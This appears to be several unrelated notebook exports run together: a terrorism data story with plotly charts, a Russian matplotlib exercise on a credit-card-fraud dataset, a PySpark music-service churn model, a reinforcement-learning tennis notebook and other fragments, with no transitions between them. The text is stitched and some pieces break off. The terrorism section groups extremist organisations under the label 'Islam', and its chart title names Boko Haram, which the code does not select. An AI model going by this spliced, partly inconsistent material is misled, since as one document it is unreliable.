0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] ... [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]]]Terrorism: looking beyond Western EuropeA data story by , , and . With the attacks in Paris still fresh in our minds, where on a Friday night in 2015, suicide bombers hit a concert hall; a major stadium; restaurants and bars, and left 130 people dead and hundreds wounded, our fear for terroristic attacks grew. However, with Paris already 4 years ago, and no new attacks this size, are these fears for a good reason? In Western Europe, terrorism is nothing new. From the seventies until the nineties it was an area of tension. These tensions were mainly caused by airplane hijackings, bombings and kidnapping due to the conflicts caused by the Cold War. 
After the war came to an end in 1991, the terrorist threat in Western Europe has significantly decreased.import pandas as pd import numpy as np from math import isnan from plotly.offline import init_notebook_mode, iplot import plotly.graph_objs as go # Start notebook mode init_notebook_mode(connected=True) pd.options.mode.chained_assignment = None def get_data(): raw_data = pd.read_csv('dataset.csv', encoding='ISO-8859-1', low_memory=False) selected_columns = raw_data[[ 'eventid', 'iyear', 'imonth', 'iday', 'country_txt', 'region_txt', 'gname', 'city', 'latitude', 'longitude', 'nkill', 'motive', 'nwound', 'nhostkid', 'success', 'natlty1_txt' ]] selected_columns['nwound'] = selected_columns['nwound'].fillna(0).astype(int) selected_columns['nkill'] = selected_columns['nkill'].fillna(0).astype(int) selected_columns['casualities'] = selected_columns['nkill'] + selected_columns['nwound'] selected_columns['amount'] = 1 return selected_columns data = get_data() data_eu = data[(data.region_txt == 'Western Europe')] data_eu = data_eu.groupby(['iyear']).sum().reset_index() data = data.groupby(['iyear']).sum().reset_index() data = [ go.Scatter( x = data_eu['iyear'], y = data_eu['amount'], name = 'Europe' ) ] layout = go.Layout(title = 'Terrorist attacks in Europe (1970-2017)', yaxis=go.layout.YAxis( title=go.layout.yaxis.Title( text='Amount of attacks')), xaxis=go.layout.XAxis( title=go.layout.xaxis.Title( text='Year')) ) fig = go.Figure(data = data, layout = layout) iplot(fig, filename = 'attacks-europe')However if you look beyond Western Europe, acts of terrorism have increased markedly across the globe. It is clearly visible that Western Europe does not have to cope with the same amount of attacks, that for example the Middle East, North Africa and South Asia have to deal with.data = get_data() data = data[data['casualities'] != 0] data = data[['region_txt','iyear','amount']] data = data.groupby(['region_txt','iyear']).sum().reset_index() data = data[data['iyear'] > 1999] data = [ go.Scatter( x= data[data['region_txt'] == 'Western Europe']['iyear'], y= data[data['region_txt'] == 'Western Europe']['amount'], name = 'Western Europe', line = dict( dash = 'dot') ), go.Scatter( x= data[data['region_txt'] == 'Eastern Europe']['iyear'], y= data[data['region_txt'] == 'Eastern Europe']['amount'], name = 'Eastern Europe' ), go.Scatter( x= data[data['region_txt'] == 'North America']['iyear'], y= data[data['region_txt'] == 'North America']['amount'], name = 'North America' ), go.Scatter( x= data[data['region_txt'] == 'South America']['iyear'], y= data[data['region_txt'] == 'South America']['amount'], name = 'South America' ), go.Scatter( x= data[data['region_txt'] == 'Sub-Saharan Africa']['iyear'], y= data[data['region_txt'] == 'Sub-Saharan Africa']['amount'], name = 'Sub-Saharan Africa' ), go.Scatter( x= data[data['region_txt'] == 'Australasia & Oceania']['iyear'], y= data[data['region_txt'] == 'Australasia & Oceania']['amount'], name = 'Australasia & Oceania' ), go.Scatter( x= data[data['region_txt'] == 'Central America & Caribbean']['iyear'], y= data[data['region_txt'] == 'Central America & Caribbean']['amount'], name = 'Central America & Caribbean' ), go.Scatter( x= data[data['region_txt'] == 'Southeast Asia']['iyear'], y= data[data['region_txt'] == 'Southeast Asia']['amount'], name = 'Southeast Asia' ), go.Scatter( x= data[data['region_txt'] == 'Middle East & North Africa']['iyear'], y= data[data['region_txt'] == 'Middle East & North Africa']['amount'], name = 'Middle East & North Africa' ), go.Scatter( 
x= data[data['region_txt'] == 'East Asia']['iyear'], y= data[data['region_txt'] == 'East Asia']['amount'], name = 'East Asia' ), go.Scatter( x= data[data['region_txt'] == 'South Asia']['iyear'], y= data[data['region_txt'] == 'South Asia']['amount'], name = 'South Asia' ), go.Scatter( x= data[data['region_txt'] == 'Central Asia']['iyear'], y= data[data['region_txt'] == 'Central Asia']['amount'], name = 'Central Asia', line = dict( dash = 'dot') ), ] layout = go.Layout( xaxis=dict( rangeslider=dict( visible = True ), type='date', title = 'Year' ), yaxis = go.layout.YAxis( title=go.layout.yaxis.Title( text='Amount of attacks') ), title = 'Amount of attacks per region (2000-2017)
Click legend to toggle traces' ) fig = go.Figure(data=data, layout = layout) iplot(fig)To substantiate the above, the chart below, showing the percentage of terrorist attacks in the world per region between 2001 and 2017, does not even place Western Europe in the top 5.def attacks_region_pie(): data = get_data() reg_count = {} for a in data.itertuples(): if a.iyear < 2001: continue if a.region_txt in reg_count: reg_count[a.region_txt] += 1 else: reg_count[a.region_txt] = 1 # initialize the 'other' category reg_count['Other Regions'] = 0 total_count = sum(reg_count.values()) should_restart = True while should_restart: should_restart = False for reg, count in reg_count.items(): if count / total_count < 0.05 and reg != 'Other Regions': reg_count['Other Regions'] += count del reg_count[reg] should_restart = True break c, r = zip(*sorted([(c, reg) for reg, c in reg_count.items()], reverse=True)) count = list(c) reg = list(r) fig = { 'data': [ { 'values': count, 'labels': reg, 'textposition': 'outside', 'textinfo': 'label+percent', 'hole': .65, 'type': 'pie' } ], 'layout': { 'title':'Percentage of terrorist attacks in the world per region (2001-2017)', 'showlegend': False, 'annotations': [ { "font": { "size": 20 }, "showarrow": False, "text": f'Total attacks
{sum(count)}' } ] } } iplot(fig) attacks_region_pie()In most parts of Europe, acts of terrorism is a relatively rare event and it is instead focused in particular countries or regions of instability. A major consequence of the rise of international terrorism has been the War on Terror. Since the attacks on the World Trade Center in New York in 2001, particularly Islamic extremist groups of Iraq and Afghanistan, as well as other operations in Yemen, Pakistan and Syria are in a rise (Roser, Nagdy, & Ritchie, 2013).def distribution(): df = get_data() df = df[df['iyear'] > 2000] df = df[df['gname'] != 'Unknown'] df = df.groupby(['gname']).sum().reset_index() df = df[['gname','casualities', 'amount']] df = df[df['amount'] > 0] df.loc[df.casualities < 7500, 'gname'] = 'Other' fig = { 'data': [ { 'values': df['casualities'], 'labels': df['gname'], 'textposition': 'outside', 'textinfo': 'label+percent', 'type': 'pie' } ], 'layout': { 'title':'Distribution of casualties by terrorist groups (2001-2017)', 'showlegend': False, } } iplot(fig) distribution()In the chart of distribution of casualties by terrorist groups, the Islamic State of Iraq and the Levant, better known as IS, together with Taliban, Al-Qaida and Boko Haram were accountable for the most casualties caused by terrorist attacks. In Western Europe, all of the major attacks since 2001 are carried out by the IS or Al-Qaida. The Boko Haram and the Taliban are active in other parts of the world. The Boko Haram is an extremist group from Nigeria and is accountable for a lot of attacks in the North of Africa. The Taliban is an Islamic terrorist organisation active in Afghanistan and Pakistan.import plotly.graph_objs as go df = get_data() df = df[(df.region_txt == 'Western Europe')] #| \ # (df.region_txt == 'Western Europe')] df = df[df['iyear'] > 2000] df = df[df['casualities'] > 0] df['text'] = df['city'] + ', ' + df['country_txt'] df_1 = df[(df.gname == '')] df_2 = df[(df.gname == 'Islamic State of Iraq and the Levant (ISIL)')] df_3 = df[(df.gname == 'Taliban')] df_4 = df[(df.gname == 'Al-Qaida')] df_5 = df[(df.gname == 'Jihadi-inspired extremists')] data = [ go.Scattergeo( lat = df_2['latitude'], lon = df_2['longitude'], text = df_2['text'].astype(str), name = 'Islamic State of Iraq and the Levant', marker = dict( color = 'blue', reversescale = True, opacity = 0.5, size = df_2['casualities'] / 12, sizemin = 3, ) ), go.Scattergeo( lat = df_1['latitude'], lon = df_1['longitude'], text = df_1['text'].astype(str), name = '', marker = dict( color = 'red', reversescale = True, opacity = 0.5, size = df_1['casualities'] / 12, sizemin = 3 ) ), go.Scattergeo( lat = df_3['latitude'], lon = df_3['longitude'], text = df_3['text'].astype(str), name = 'Taliban', marker = dict( color = 'green', reversescale = True, opacity = 0.5, size = df_3['casualities'] / 12, sizemin = 3 ) ), go.Scattergeo( lat = df_4['latitude'], lon = df_4['longitude'], text = df_4['text'].astype(str), name = 'Al-Qaida', marker = dict( color = 'green', reversescale = True, opacity = 0.5, size = df_4['casualities'] / 12, sizemin = 3 ) ) #, #go.Scattergeo( # lat = df_5['latitude'], # lon = df_5['longitude'], # text = df_5['text'].astype(str), # name = 'Jihadi-inspired extremists (red)', # marker = dict( # color = 'red', # reversescale = True, # opacity = 0.5, # size = df_5['casualities'] / 12, # sizemin = 3 # ) #) ] layout = dict( title = 'Terrorist attacks by the major organisations in Western Europe (2001-2017)', geo = dict( scope = 'europe', showland = True, landcolor = "rgb(212, 
212, 212)", subunitcolor = "rgb(255, 255, 255)", countrycolor = "rgb(255, 255, 255)", showlakes = True, lakecolor = "rgb(255, 255, 255)", showsubunits = True, showcountries = True, resolution = 110, projection = dict( type = 'equirectangular' ))) fig = go.Figure(data=data, layout=layout ) iplot(fig)When in fact all of the major terrorist attacks in Western Europe since 2001 are caused by Islamic extremist groups, the threat in Western Europe is nothing compared to the rest of the world.data = get_data() data_eu = data[(data.region_txt == 'Western Europe')] data_eu = data_eu[data_eu['iyear'] > 1999] data = data[data['iyear'] > 1999] data.loc[data.gname == 'Taliban', 'gname'] = 'Islam' data.loc[data.gname == 'Al-Qaida', 'gname'] = 'Islam' data.loc[data.gname == '', 'gname'] = 'Islam' data.loc[data.gname == 'Islamic State of Iraq and the Levant (ISIL)', 'gname'] = 'Islam' data_eu.loc[data_eu.gname == 'Taliban', 'gname'] = 'Islam' data_eu.loc[data_eu.gname == 'Al-Qaida', 'gname'] = 'Islam' data_eu.loc[data_eu.gname == '', 'gname'] = 'Islam' data_eu.loc[data_eu.gname == 'Islamic State of Iraq and the Levant (ISIL)', 'gname'] = 'Islam' data = data.groupby(['gname','iyear']).sum().reset_index() data_eu = data_eu.groupby(['gname','iyear']).sum().reset_index() data = [ go.Bar( x = data[data['gname'] == 'Islam']['iyear'], y = data[data['gname'] == 'Islam']['casualities'], name = 'World' ), go.Bar( x = data_eu[data_eu['gname'] == 'Islam']['iyear'], y = data_eu[data_eu['gname'] == 'Islam']['casualities'], name = 'Western Europe' ) ] layout = go.Layout(barmode = 'stack', title = 'Casualties by the 4 major Islamic organisations (ISIL, Taliban, Al-Qaida & Boko Haram)', yaxis=go.layout.YAxis( title=go.layout.yaxis.Title( text='Amount of casualties')), xaxis=go.layout.XAxis( title=go.layout.xaxis.Title( text='Year'))) fig = go.Figure(data = data, layout = layout) iplot(fig)Тема “Визуализация данных в Matplotlib”Задание 1Загрузите модуль pyplot библиотеки matplotlib с псевдонимом plt, а также библиотеку numpy с псевдонимом np.Примените магическую функцию %matplotlib inline для отображения графиков в Jupyter Notebook и настройки конфигурации ноутбука со значением 'svg' для более четкого отображения графиков.Создайте список под названием x с числами 1, 2, 3, 4, 5, 6, 7 и список y с числами 3.5, 3.8, 4.2, 4.5, 5, 5.5, 7.С помощью функции plot постройте график, соединяющий линиями точки с горизонтальными координатами из списка x и вертикальными - из списка y.Затем в следующей ячейке постройте диаграмму рассеяния (другие названия - диаграмма разброса, scatter plot).import matplotlib.pyplot as plt import numpy as np %matplotlib inline %config InlineBackend.figure_format = 'svg' x=[1, 2, 3, 4, 5, 6, 7] y=[3.5, 3.8, 4.2, 4.5, 5, 5.5, 7] plt.plot(x,y) plt.show() plt.scatter(x,y) plt.show()Задание 2С помощью функции linspace из библиотеки Numpy создайте массив t из 51 числа от 0 до 10 включительно.Создайте массив Numpy под названием f, содержащий косинусы элементов массива t.Постройте линейную диаграмму, используя массив t для координат по горизонтали,а массив f - для координат по вертикали. Линия графика должна быть зеленого цвета.Выведите название диаграммы - 'График f(t)'. 
Также добавьте названия для горизонтальной оси - 'Значения t' и для вертикальной - 'Значения f'.Ограничьте график по оси x значениями 0.5 и 9.5, а по оси y - значениями -2.5 и 2.5.t = np.linspace(0, 10, 51) # количество точек проверил, диапазоны верны f = np.cos(t) plt.plot(t,f, marker='o', color = "g") plt.title('График f(t)') plt.xlabel('Значения t') plt.ylabel('Значения f') plt.axis([0.5, 9.5, -2.5, 2.5]) plt.show()*Задание 3С помощью функции linspace библиотеки Numpy создайте массив x из 51 числа от -3 до 3 включительно.Создайте массивы y1, y2, y3, y4 по следующим формулам:y1 = x**2y2 = 2 * x + 0.5y3 = -3 * x - 1.5y4 = sin(x)Используя функцию subplots модуля matplotlib.pyplot, создайте объект matplotlib.figure.Figure с названием fig и массив объектов Axes под названием ax,причем так, чтобы у вас было 4 отдельных графика в сетке, состоящей из двух строк и двух столбцов. В каждом графике массив x используется для координат по горизонтали.В левом верхнем графике для координат по вертикали используйте y1,в правом верхнем - y2, в левом нижнем - y3, в правом нижнем - y4.Дайте название графикам: 'График y1', 'График y2' и т.д.Для графика в левом верхнем углу установите границы по оси x от -5 до 5.Установите размеры фигуры 8 дюймов по горизонтали и 6 дюймов по вертикали.Вертикальные и горизонтальные зазоры между графиками должны составлять 0.3.x = np.linspace (-3, 3, 51) y1 = x**2 y2 = 2 * x + 0.5 y3 = -3 * x - 1.5 y4 =np.sin(x) fig, ax = plt.subplots(2,2) ax1, ax2, ax3, ax4 = ax.flatten() ax1.plot(x, y1) ax2.plot(x, y2) ax3.plot(x, y3) ax4.plot(x, y4) ax1.set_title('График y1') ax2.set_title('График y2') ax3.set_title('График y3') ax4.set_title('График y4') ax1.set_xlim([-5,5]) fig.set_size_inches(8,6) plt.subplots_adjust(wspace=0.3, hspace=0.3)*Задание 4В этом задании мы будем работать с датасетом, в котором приведены данные по мошенничеству с кредитными данными: Credit Card Fraud Detection (информация об авторах: , , and . Calibrating Probability with Undersampling for Unbalanced Classification. In Symposium on Computational Intelligence and Data Mining (CIDM), IEEE, 2015).Ознакомьтесь с описанием и скачайте датасет creditcard.csv с сайта Kaggle.com по ссылке:https://www.kaggle.com/mlg-ulb/creditcardfraudДанный датасет является примером несбалансированных данных, так как мошеннические операции с картами встречаются реже обычных.Импортруйте библиотеку Pandas, а также используйте для графиков стиль “fivethirtyeight”.Посчитайте с помощью метода value_counts количество наблюдений для каждого значения целевой переменной Class и примените к полученным данным метод plot, чтобы построить столбчатую диаграмму. Затем постройте такую же диаграмму, используя логарифмический масштаб.На следующем графике постройте две гистограммы по значениям признака V1 - одну для мошеннических транзакций (Class равен 1) и другую - для обычных (Class равен 0). Подберите значение аргумента density так, чтобы по вертикали графика было расположено не число наблюдений, а плотность распределения. Число бинов должно равняться 20 для обеих гистограмм, а коэффициент alpha сделайте равным 0.5, чтобы гистограммы были полупрозрачными и не загораживали друг друга. Создайте легенду с двумя значениями: “Class 0” и “Class 1”. Гистограмма обычных транзакций должна быть серого цвета, а мошеннических - красного. 
Горизонтальной оси дайте название “Class”.import pandas as pd dataset_path = 'creditcard.csv' # dataset_prepared_path = r'‪C:\Users\SidorenkoVA\Desktop\GB\creditcard_data_preparated.csv' df = pd.read_csv(dataset_path) df.head() plt.style.use('fivethirtyeight') class_vals = df['Class'].value_counts() class_vals classvals = df["Class"].value_counts() classvals.plot(kind="bar") plt.show()Sparkify Project WorkspaceThis workspace contains a tiny subset (128MB) of the full dataset available (12GB). The analysis will be the same, and some numbers are going to change, with the larger dataset.# import libraries from pyspark.sql import SparkSession from pyspark.sql import Window from pyspark.sql.functions import * from pyspark.sql.types import * from pyspark.ml.feature import StandardScaler, StringIndexer, VectorAssembler, OneHotEncoderEstimator from pyspark.ml.linalg import DenseVector, SparseVector from pyspark.ml import Pipeline from pyspark.ml.classification import LogisticRegression, RandomForestClassifier, GBTClassifier from pyspark.ml.tuning import CrossValidator, ParamGridBuilder from pyspark.ml.evaluation import RegressionEvaluator, MulticlassClassificationEvaluator, BinaryClassificationEvaluator from sklearn.metrics import classification_report, confusion_matrix import re import time import datetime import numpy as np import pandas as pd from matplotlib import pyplot as plt import seaborn as sns ! pip install user_agents from user_agents import parse import re %matplotlib inline # create a Spark session spark = SparkSession \ .builder \ .appName('Sparkify')\ .getOrCreate() # all the parameter of spark Context spark.sparkContext.getConf().getAll()Load and Clean DatasetIn this workspace, the mini-dataset file is `mini_sparkify_event_data.json`. We will load and clean the dataset using Spark, checking for invalid or missing data - for example, records without userids or sessionids.# load data event_data = "mini_sparkify_event_data.json" df = spark.read.json(event_data) # print first five rows df.head(5) df.printSchema() df.select('userId').dropDuplicates().sort('userId').show() # an empty space is found here def clean_data(df): ''' Drop invalid or missing data ''' df = df.dropna(how = 'any', subset = ['userId', 'sessionId']) df = df.filter(df['userId'] != '') return df df = clean_data(df) # checking for null values in columns df_null = df.agg(*[count(when(isnull(c), c)).alias(c) for c in df.columns]) df_null.show() df.filter(df.song.isNotNull()).select('page').dropDuplicates().show()+--------+ | page| +--------+ |NextSong| +--------+The columns: artist, length, and song are empty when the page is not 'NextSong'. These are not invalid data. Exploratory Data Analysis Define ChurnWe will create a column `Churn` to use as the label for our model. We will use the `Cancellation Confirmation` events to define your churn, which happen for both paid and free users.def create_label(df): ''' Create a column 'Churn' to use as the label for the model. 
''' churned_users = df.where(df.page == 'Cancellation Confirmation').select('userId').distinct() churned_users_list = list(churned_users.select('userId').toPandas()['userId']) df = df.withColumn('Churn', df.userId.isin(churned_users_list)) return df df = create_label(df) df.groupby(df.Churn).agg(countDistinct('userId')).show() print('{0:.0%} of users have churned'.format(52/(52+173)))23% of users have churnedExplore DataHere we are going to perform exploratory data analysis to observe the behavior for users who stayed vs users who churned.# print the first five rows pd.DataFrame(df.take(5), columns=df.columns).head()User Analysis Gender and Churngender = df.groupby(df.Churn, df.gender).agg(countDistinct('userId')).toPandas() gender.sort_values(by='gender') print('{0:.0%} of female users have churned'.format(20/(20+84))) print('{0:.0%} of male users have churned'.format(32/(32+89))) gender.pivot(index='gender', columns='Churn', values = 'count(DISTINCT userId)').plot(kind='bar');Level and Churnlevel = df.groupby(df.Churn, df.level).agg(countDistinct('userId')).toPandas() level.sort_values(by='level') print('{0:.0%} of free level users have churned'.format(46/(46+149))) print('{0:.0%} of paid level users have churned'.format(36/(36+129))) level.pivot(index='level', columns='Churn', values = 'count(DISTINCT userId)').plot(kind='bar');Male users have a higher proportion of churn than female users, and free users have a higher proportion of churn than paid users. ActivitiesActivity-related variables aggregated on churn.df.groupby(df.Churn, df.auth).agg(countDistinct('sessionId')).show() df.groupby(df.Churn).agg(avg('itemInSession')).show() df.groupby(df.Churn).agg(avg('length')).show() df.groupby(df.Churn, df.method).agg(countDistinct('sessionId')).show() page = df.groupby(df.page, df.Churn).agg(countDistinct('sessionId')).sort('page', 'Churn').toPandas() page.pivot(index='page', columns='Churn', values = 'count(DISTINCT sessionId)').plot(kind='bar', figsize=(20,3)); pagedf = page.groupby(['page', 'Churn'])['count(DISTINCT sessionId)'].sum() page_pcts = pagedf.groupby(level=0).apply(lambda x: 100 * x / float(x.sum())) page_pctsIt is difficult to see a clear relationship between visited page and churn. Attributes like Roll Advert, Submit Downgrade/Upgrade, Thumbs Down, and Upgrade seem to have a stronger relationship with Churn than other page visits. 
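To make that page/churn comparison a little more concrete, one option is to compute, for each page, the share of distinct sessions that came from churned users. The following is a minimal pandas sketch added for illustration (not part of the original analysis); it assumes the `page` DataFrame built above, with its `page`, `Churn`, and `count(DISTINCT sessionId)` columns.
```python
# Hedged sketch: per-page share of distinct sessions that belong to churned users.
# Assumes `page` is the pandas DataFrame created above, with a boolean 'Churn' column.
pivot = page.pivot(index='page', columns='Churn',
                   values='count(DISTINCT sessionId)').fillna(0)
pivot['churn_share'] = pivot[True] / (pivot[True] + pivot[False])
# Pages whose sessions are dominated by churned users float to the top.
pivot.sort_values('churn_share', ascending=False).head(10)
```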
Feature Engineering# Functions for feature engineering def int_label(df): df = df.withColumn('label', df['Churn'].cast(IntegerType())) return df def tenure(df): ''' Calculate tenure: the last interacted date - registration date ''' max_ts_df = df.groupBy('userId').agg(max('ts').alias('max_ts')) df = df.join(max_ts_df, on=['userId'], how = 'left') df = df.withColumn('tenure', ((df.max_ts-df.registration)/86400000).cast(IntegerType())) return df def state_variable(df): ''' Create State from location ''' get_state = udf(lambda x: x.split(',')[1]) df = df.withColumn('state', get_state(df.location)) return df def device_variables(df): get_browser = udf(lambda x: parse(x).browser.family) get_os = udf(lambda x: parse(x).os.family) get_device = udf(lambda x: parse(x).device.family) df = df.withColumn('browser', get_browser(df.userAgent)) df = df.withColumn('os', get_os(df.userAgent)) df = df.withColumn('device', get_device(df.userAgent)) return df def user_stats(df): ''' Create user level stats ''' w = Window.partitionBy(df.userId) df = df.withColumn('num_songs', approx_count_distinct(df.song).over(w)) df = df.withColumn('num_artists', approx_count_distinct(df.artist).over(w)) df = df.withColumn('avg_length', avg(df.length).over(w)) return df def page_variables(df): ''' Based on EDA, create variables indicating if a user visited specific pages In addition to the pages that show stronger relationship with churn, we will make variables for Add Friend and Add to Playlist page visits ''' RollAdvert = df.where(df.page == 'Roll Advert').select('userId').distinct() RollAdvert_list = list(RollAdvert.select('userId').toPandas()['userId']) df = df.withColumn('roll_advert', df.userId.isin(RollAdvert_list)) Downgrade = df.where(df.page == 'Submit Downgrade').select('userId').distinct() Downgrade_list = list(Downgrade.select('userId').toPandas()['userId']) df = df.withColumn('downgrade', df.userId.isin(Downgrade_list)) Upgrade = df.where(df.page == 'Submit Upgrade').select('userId').distinct() Upgrade_list = list(Upgrade.select('userId').toPandas()['userId']) df = df.withColumn('upgrade', df.userId.isin(Upgrade_list)) Thumbsdown = df.where(df.page == 'Thumbs Down').select('userId').distinct() Thumbsdown_list = list(Thumbsdown.select('userId').toPandas()['userId']) df = df.withColumn('thumbsdown', df.userId.isin(Thumbsdown_list)) AddFriend = df.where(df.page == 'Add Friend').select('userId').distinct() AddFriend_list = list(AddFriend.select('userId').toPandas()['userId']) df = df.withColumn('addfriend', df.userId.isin(AddFriend_list)) AddtoPlaylist = df.where(df.page == 'Add to Playlist').select('userId').distinct() AddtoPlaylist_list = list(AddtoPlaylist.select('userId').toPandas()['userId']) df = df.withColumn('addtoplaylist', df.userId.isin(AddtoPlaylist_list)) return df df = int_label(df) df = tenure(df) df = state_variable(df) df = device_variables(df) df = user_stats(df) df = page_variables(df) pd.DataFrame(df.take(5), columns=df.columns).head() def drop_columns(df): ''' Drop unnecessary columns before modeling ''' columns_to_drop = ['userId', 'artist', 'auth', 'firstName', 'itemInSession', 'lastName', 'length', 'location', 'method', 'page', 'registration', 'sessionId', 'song', 'status', 'ts', 'userAgent', 'max_ts', 'Churn'] df = df.drop(*columns_to_drop) return df df_model = drop_columns(df) pd.DataFrame(df_model.orderBy(rand()).take(5), columns=df_model.columns)ModelingHere we are going to split the full dataset into train, test, and validation sets. 
Then test out machine learning methods like logistic regresion, random forest classifier and gradient.boosted tree classifier. We are going to evaluate the accuracy of the various models, tuning parameters as necessary, and then we will determine the winning model based on test accuracy and report results on the validation set. Since the churned users are a fairly small subset, we will use F1 score as the metric to optimize.train, test = df_model.randomSplit([0.7, 0.3], seed=42) # get the dimensions of the data print(train.count(), len(train.columns)) print(test.count(), len(test.columns)) # String Indexer for OneHotEncoderEstimator SI_gender = StringIndexer(inputCol='gender', outputCol='gender_index') SI_level = StringIndexer(inputCol='level', outputCol='level_index') SI_state = StringIndexer(inputCol='state', outputCol='state_index') SI_browser = StringIndexer(inputCol='browser', outputCol='browser_index') SI_os = StringIndexer(inputCol='os', outputCol='os_index') SI_device= StringIndexer(inputCol='device', outputCol='device_index') # OneHotEncoderEstimator OHE = OneHotEncoderEstimator(inputCols=['gender_index', 'level_index', 'state_index', 'browser_index', 'os_index', 'device_index'], outputCols=['gender_OHE', 'level_OHE', 'state_OHE', 'browser_OHE', 'os_OHE', 'device_OHE']) # Create a vector of all numeric features for scaling num_assembler = VectorAssembler(inputCols=['tenure', 'num_songs', 'num_artists', 'avg_length'], outputCol='NumFeatures') # Standard scaler for numeric features scaler = StandardScaler(inputCol='NumFeatures', outputCol='ScaledNumFeatures', withStd=True) # Create a vector of all features for modeling feature_assembler = VectorAssembler(inputCols=['ScaledNumFeatures', 'gender_OHE', 'level_OHE', 'state_OHE', 'browser_OHE', 'os_OHE', 'device_OHE', 'roll_advert', 'downgrade', 'upgrade', 'thumbsdown', 'addfriend', 'addtoplaylist'], outputCol='features') # Logistic regresion model lr = LogisticRegression(featuresCol='features', labelCol='label') lr_pipeline = Pipeline(stages=[SI_gender, SI_level, SI_state, SI_browser, SI_os, SI_device, OHE, num_assembler, scaler, feature_assembler, lr]) # Random Forest Classifier model rf = RandomForestClassifier(featuresCol='features', labelCol='label') rf_pipeline = Pipeline(stages=[SI_gender, SI_level, SI_state, SI_browser, SI_os, SI_device, OHE, num_assembler, scaler, feature_assembler, rf]) # Gradient.Boosted tree classifier model gbt = GBTClassifier(featuresCol='features', labelCol='label') gbt_pipeline = Pipeline(stages=[SI_gender, SI_level, SI_state, SI_browser, SI_os, SI_device, OHE, num_assembler, scaler, feature_assembler, gbt]) # training models lr_model = lr_pipeline.fit(train) rf_model = rf_pipeline.fit(train) gbt_model = gbt_pipeline.fit(train) # obtain predictions lr_preds = lr_model.transform(test) rf_preds = rf_model.transform(test) gbt_preds = gbt_model.transform(test)Evaluation (F1 and Accuracy)my_eval = MulticlassClassificationEvaluator(labelCol = 'label') acc_eval = MulticlassClassificationEvaluator(metricName='accuracy') f1_eval = MulticlassClassificationEvaluator(metricName='f1') # Calculating metrics acc = acc_eval.evaluate(lr_preds) f1 = f1_eval.evaluate(lr_preds) print(f'Accuracy: {acc:<4.2%} F-1 Score: {f1:<4.3f}') # Calculating metrics acc = acc_eval.evaluate(rf_preds) f1 = f1_eval.evaluate(rf_preds) print(f'Accuracy: {acc:<4.2%} F-1 Score: {f1:<4.3f}') # Calculating metrics acc = acc_eval.evaluate(gbt_preds) f1 = f1_eval.evaluate(gbt_preds) print(f'Accuracy: {acc:<4.2%} F-1 Score: {f1:<4.3f}') # Confusion 
matrix for gbt y_true = gbt_preds.select(['label']).collect() y_pred = gbt_preds.select(['prediction']).collect() print(classification_report(np.hstack(y_true),np.hstack(y_pred))) ax = plt.subplot() conf = confusion_matrix(y_true, y_pred) sns.heatmap(conf, annot=True, ax = ax, cmap='Blues', fmt='g') ax.set_xlabel('Predicted labels'); ax.set_ylabel('True labels'); ax.set_title('Confusion Matrix');Step 5. Code for Hyper Parameter Tunin# Set the Parameters grid gbt_paramGrid = (ParamGridBuilder() .addGrid(gbt.maxDepth, [3, 5]) .addGrid(gbt.maxBins, [15, 30]) .build()) gbt_cv = CrossValidator(estimator=gbt_pipeline, estimatorParamMaps=gbt_paramGrid, evaluator=my_eval, numFolds = 3, seed=42, parallelism=2) cvModel = gbt_cv.fit(train) cvResults = cvModel.transform(test) acc_eval = MulticlassClassificationEvaluator(metricName='accuracy') f1_eval = MulticlassClassificationEvaluator(metricName='f1') # Calculating metrics acc = acc_eval.evaluate(cvResults) f1 = f1_eval.evaluate(cvResults) print(f'Accuracy: {acc:<4.2%} F-1 Score: {f1:<4.3f}')Accuracy: 99.34% F-1 Score: 0.993Collaboration and Competition---In this notebook, you will learn how to use the Unity ML-Agents environment for the third project of the [Deep Reinforcement Learning Nanodegree](https://www.udacity.com/course/deep-reinforcement-learning-nanodegree--nd893) program. 1. Start the EnvironmentWe begin by importing the necessary packages. If the code cell below returns an error, please revisit the project instructions to double-check that you have installed [Unity ML-Agents](https://github.com/Unity-Technologies/ml-agents/blob/master/docs/Installation.md) and [NumPy](http://www.numpy.org/).from Unity_Env_Wrapper import TennisEnv from buffer import ReplayBuffer from maddpg import MADDPG import torch import numpy as np import os from collections import deque from ddpg import DDPGAgent import torch import torch.nn.functional as FEnvironments contain **_brains_** which are responsible for deciding the actions of their associated agents. Here we check for the first brain available, and set it as the default brain we will be controlling from Python.main_tennis() fig = plt.figure() ax = fig.add_subplot(111) plt.plot(np.arange(1, len(scores)+1), scores) plt.ylabel('Score') plt.xlabel('Episode #')Train and Test SplitIf you are interested in using the same train/test split as the paper, use the indices specified belowtest_ind = np.hstack((np.arange(0,(numBat1+numBat2),2),83)) train_ind = np.arange(1,(numBat1+numBat2-1),2) secondary_test_ind = np.arange(numBat-numBat3,numBat); print (test_ind) print (train_ind) print (secondary_test_ind)[ 0 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 34 36 38 40 42 44 46 48 50 52 54 56 58 60 62 64 66 68 70 72 74 76 78 80 82] [ 1 3 5 7 9 11 13 15 17 19 21 23 25 27 29 31 33 35 37 39 41 43 45 47 49 51 53 55 57 59 61 63 65 67 69 71 73 75 77 79 81] [ 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123]Cleaning RWTH German Fingerspelling DataThe script `./registerRecordedGesturesAll.sh ` converts the video from training session and test session to jpeg images. However, not all frames of video contain valid fingerspelling image. 
